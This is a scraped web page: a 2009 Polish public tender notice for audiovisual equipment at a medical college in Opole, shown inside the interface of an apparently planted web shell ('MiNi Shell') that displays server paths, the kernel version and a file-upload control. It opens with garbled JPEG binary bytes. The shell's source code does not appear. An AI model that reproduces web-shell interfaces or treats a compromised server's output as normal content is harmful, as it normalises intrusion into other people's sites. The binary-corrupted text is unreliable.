JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/45053-N-2009.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na dostawę nowego sprzętu audiowizualnego dla Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu -( nr sprawy: OPZ-381-01/09)</b><br>
<b>Numer ogłoszenia: 45053 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu , ul. Katowicka 68, 45-060 Opole, woj. opolskie, tel. 077 4423524, 4423520, faks 077 4423517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.wsm.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę nowego sprzętu audiowizualnego dla Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu -( nr sprawy: OPZ-381-01/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1).Przedmiotem zamówienia jest sprzedaż przez Wykonawcę wraz z montażem fabrycznie nowych urządzeń multimedialnych stanowiących po zamontowaniu zintegrowany system audiowizualny u Zamawiającego w budynku Sali audytoryjnej przy ulicy Katowickiej 68 w Opolu. 
Są to:
Projektor multimedialny z obiektywem - 2 szt;
Ekran projekcyjny elektrycznie rozwijany - 2 szt; 
Zestaw komputerowy stacjonarny - 2 szt;
Zasilacz awaryjny do stacji roboczych - 2 szt;
Monitor LCD - 2 szt;
Wzmacniacz dystrybucyjny/rozdzielacz sygnału RGB - 4szt;
Przełącznik sygnału RGB/Audio - 2szt;
Mikrofon bezprzewodowy typu /handheld/ - 2 szt;
Mikrofon bezprzewodowy typu /lavalier/ - 2 szt;
Mikrofon przewodowy pojemnościowy z podstawką - 2szt;
Mikrofon pojemnościowy zakończony czopem - 2szt;
Mikser automatyczny do obsługi mikrofonów - 2szt;
Eliminator sprzężeń akustycznych - 2szt;
4 - kanałowy wzmacniacz mocy sygnału audio - 2szt;
Głośnik sufitowy - 32szt;
2-kanałowy wzmacniacz mocy sygnału audio - 2szt;
Trójdrożny zestaw głośnikowy - 4szt;
Przyłącze sygnałowe PAV-A - 1szt;
Przyłącze sygnałowe PAV-B - 1szt;
Przyłącze sygnałowe PPA1 / PPA2 - 1 zestaw;
Przyłącze sygnałowe PPB1 / PPB2 - 1 zestaw;
Rozdzielnica natynkowa RE-AV - 1 kpl;
Katedra multimedialna z mównicą - 2 zestawy;
Stojak meblowy na urządzenia systemu AV - 2szt;
Listy zasilające przeciwprzepięciowe - 2szt.

Opis szczegółowy paramterów technicznych zamówienia został określony w załącznikach do SIWZ.

2).Dodatkowe warunki dotyczące przedmiotu zamówienia:
a).Monitory LCD nie będą posiadały żadnych uszkodzonych pikseli, co zostanie sprawdzone u zamawiającego przed instalacją i odnotowane w protokole odbioru
Wykonawca udzieli gwarancji jakości na okres nie krótszy jak wymagany w załączniku nr 1 do SIWZ na warunkach nie mniej korzystnych dla Zamawiającego jak określone w załączniku nr 12 do SIWZ; 
b). Dostarczone urządzenia, oraz oprogramowanie komputerowe, będą posiadały niezbędne do normalnego funkcjonowania instrukcje i certyfikaty oraz sterowniki zapewniające prawidłowe funkcjonowanie;
c). Dostarczone urządzenia po zainstalowaniu u Zamawiającego powinny być w pełni przygotowany do pracy tworząc zintegrowany system audiowizualny (tzn.: - oprogramowania we wszystkich tego wymagających urządzeniach muszą być zainstalowane; - urządzenia winny być połączone w sposób odpowiedni do ich przeznaczenia a zarazem zbieżny z opisem przedmiotu zamówienia dając efekt końcowy technicznie sprawnego i optymalnie dostrojonego przekazu i odbioru sygnału wizji oraz fonii w Sali audytoryjnej przy wymaganych w SIWZ parametrach technicznych; - meble wykonane zgodnie z wytycznymi w SIWZ, na których wmontuje przeznaczone na to urządzenia  zakupione w niniejszym postępowaniu).
3). Wykonawca, który powołuje się w ofercie na rozwiązania równoważne opisywanym przez zamawiającego urządzeniom w załączniku nr 2 do SIWZ, jest, zgodnie z art.30 ust. 5 (ustawy Prawo Zamówień Publicznych), obowiązany wykazać, że oferowane przez niego urządzenia spełniają wymagania określone przez zamawiającego w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 32.30.00.00-6, 30.20.00.00-1, 39.10.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca, który ubiega się o zamówienie, musi spełnić łącznie następujące warunki, dopuszczone i zawarte w ustawie Prawo Zamówień Publicznych z dnia 29.01.2004r., tzn. wykonawca :
1).oświadczy, że spełnia warunek określony:
a). w art.22 ust.1 pkt.2 ustawy Prawo Zamówień Publicznych lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
b). w art.22 ust.1 pkt.3 ustawy Prawo Zamówień Publicznych;
c). w art.22 ust.1 pkt.4 ustawy Prawo Zamówień Publicznych.
2). Dla wykazania, iż nie podlega wykluczeniu na podstawie art.24 ustawy Prawo Zamówień Publicznych, dołączy dokument określony w punkcie 1 lit.d pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu].
3).Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach wyszczególnionych w punkcie 1 pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu]. Z treści wymaganych oświadczeń i dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.
4).Przy ocenie spełniania warunków udziału w postępowaniu przez wykonawców ubiegających się wspólnie o udzielenie zamówienia: 
a).w odniesieniu do wymagań postawionych przez Zamawiającego w pkt 1 niniejszego pola: - oświadczenie z art. 22 ust.1 pkt.2-3 ustawy PZP może być złożone łącznie przez wszystkich uczestników wspólnie ubiegających się o zamówienie; - oświadczenie z art. 22 ust.1 pkt. 4 PZP musi być złożone oddzielnie przez każdego z wykonawców wspólnie ubiegającego się o udzielnie zamówienia; 
b).w odniesieniu do wymagań postawionych przez Zamawiającego w pkt. 2 niniejszego pola, każdy z wykonawców wspólnie ubiegających się o udzielnie zamówienia musi oddzielnie złożyć dokumenty określone w pkt.1 lit d pola [Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu], wykazując nimi, iż nie podlega wykluczeniu na podstawie art.24 ustawy Prawo Zamówień Publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1).Wymagane dokumenty od wykonawcy:
a).dla wymogu z pkt. 1 lit.a pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l  pkt.2 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 11 do SIWZ) lub  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
b).dla wymogu z pkt.1 lit.b pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l pkt.3 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 13 do SIWZ);
c).dla wymogu z pkt.1 lit.c pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], oświadczenie o spełnianiu warunków, o których mowa w art.22 ust. l  pkt.4 ustawy Prawo Zamówień Publicznych (wg wzoru stanowiącego załącznik nr 14 do SIWZ);
d).dla wymogu z pkt.2 pola [Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków], aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.wsm.opole.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu 
ul. Katowicka 68, 45-060 Opole.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 12:00, miejsce: Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 102, I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com